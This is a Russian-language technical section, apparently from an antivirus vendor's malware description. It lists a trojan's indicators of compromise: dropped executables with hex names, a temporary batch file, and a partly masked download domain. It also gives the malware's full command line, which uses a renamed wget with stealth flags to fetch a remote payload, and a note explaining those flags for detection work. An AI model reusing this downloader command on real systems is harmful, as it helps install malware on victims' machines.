Техническая информация
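- <LS_APPDATA>\F8CF33AD986170E3D24561D4B8B8D76B.EXE -o F70130C44CDD00A372972E2323195E7A -d -t 0 --retry-connrefused -w 5 --random-wait --no-dns-cache --restrict-file-names=windows -nd -nH --no-cache --ignore-length --no-cookies --no-check-certificate --follow-ftp http://cl#####eowatchers.net/adsgk.php
  (Примечание: набор параметров совпадает с параметрами GNU Wget, поэтому исполняемый файл с шестнадцатеричным именем, по-видимому, является переименованной копией wget. В этом случае ключ -o задаёт файл журнала, а не загружаемый документ: F70130C44CDD00A372972E2323195E7A — журнал, а сам ответ сервера сохраняется как adsgk.php. Оба файла присутствуют в списке ниже. При поиске следов заражения стоит учитывать сочетание параметров командной строки, а не только имя файла.)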
- <SYSTEM32>\cmd.exe /c ""%WINDIR%\Temp\a00293.bat" <Полный путь к вирусу>"
- %WINDIR%\Temp\a00293.bat
- <LS_APPDATA>\F70130C44CDD00A372972E2323195E7A
- <LS_APPDATA>\adsgk.php
- <LS_APPDATA>\pcre3.dll
- <LS_APPDATA>\C0CA437737654CA667038D6B2C1B5D1E.EXE
- <LS_APPDATA>\C907D7A30E7D43AFD00202154480A33A.EXE
- <LS_APPDATA>\F8CF33AD986170E3D24561D4B8B8D76B.EXE
- %WINDIR%\Temp\a00293.bat
- 'cl#####eowatchers.net':80
- cl#####eowatchers.net/adsgk.php
- DNS ASK cl#####eowatchers.net